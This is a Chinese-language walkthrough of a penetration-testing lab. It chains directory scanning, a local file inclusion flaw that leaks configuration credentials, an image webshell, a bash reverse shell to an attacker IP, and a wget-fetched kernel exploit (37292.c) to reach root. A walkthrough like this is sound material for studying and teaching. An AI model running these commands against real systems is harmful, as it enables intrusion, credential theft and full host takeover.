(一)信息收集
1.主机发现,端口扫描
开启了22(ssh服务)、80(http服务)端口
2.目录扫描
存在http服务,可以使用一个大字典进行目录扫描
dirb http://192.168.108.130 /usr/share/wordlists/dirb/big.txt
3.web渗透
1)index页面
尝试POST提交万能密码,失败
2)目录扫描发现phpmy页面
暂时没有密码
3)in页面
phpinfo的信息泄露
允许本地文件包含
4)test页面
尝试GET类型传参file 失败
尝试POST类型 发现存在文件包含漏洞和文件下载漏洞
包含本页面查看源码
这个包含漏洞可以任意下载文件
5)根据目录扫描的结果,我们对其进行包含下载来查看源码和配置信息
我们也可以尝试包含phpmy的默认配置文件 /etc/phpmy/config.inc.php
获得账户密码
查看c.php 发现了一个数据库的账号和密码
尝试登录 可以成功登录
、
获得了一个账户和密码
6)尝试登录首页
登陆成功
7)通过刚刚的文件下载漏洞,下载panel.php 对panel页面的源码进行分析
发现POST传递的load是一个被包含的变量,用burp进行分析
load参数可以包含
8)对panel页面的功能进行分析
show的功能-展现当前用户信息
可以获取到上传后图片的路径
add功能 添加用户并且上传头像
分析panel源码,发现文件上传使用白名单过滤
我们也能获取到上传后图片的路径 -考虑图片马的制作,来结合这里的包含漏洞解析
9)图片马制作
创建666.php文件写入一句话
下载一个图片
把这两个文件放在一个目录下,在该目录运行cmd 生成图片coco666.jpg
copy 2.jpg/b + 666.php/a coco666.jpg
上传我们的图片马
10)找到我们图片马的地址 /uploaded_images/coco666.jpg
11)制作反弹shell木马文件
kali命令行里输入nc -lvnp 9999开始监听
同时burp的post请求中执行
echo "bash -i >& /dev/tcp/192.168.108.128/9999 0>&1" | bash
这里注意,因为我们构造的是POST的一句话所以在反弹nc的时候把shell参数放在表单里提交。
上线啦
打开新的终端,使用 Kali 的漏洞扫描库
searchsploit Ubuntu 12.04
有版本权限覆盖漏洞,可以用来提权 -提权文件(37292.c)
37292.c 放到自己的网站根目录下
cd /usr/share/exploitdb/exploits/linux/local
cp 37292.c /var/www/html
开启 Apache 服务
/etc/init.d/apache2 start
回到 shell,因为权限不够,所以切换到临时目录,使用 wget 下载
cd /tmp
wget http://192.168.108.128/37292.c
对其编译并执行,提权成功。是root权限
进入数据库并且查看配置文件
发现一个用户名:root和密码:roottoor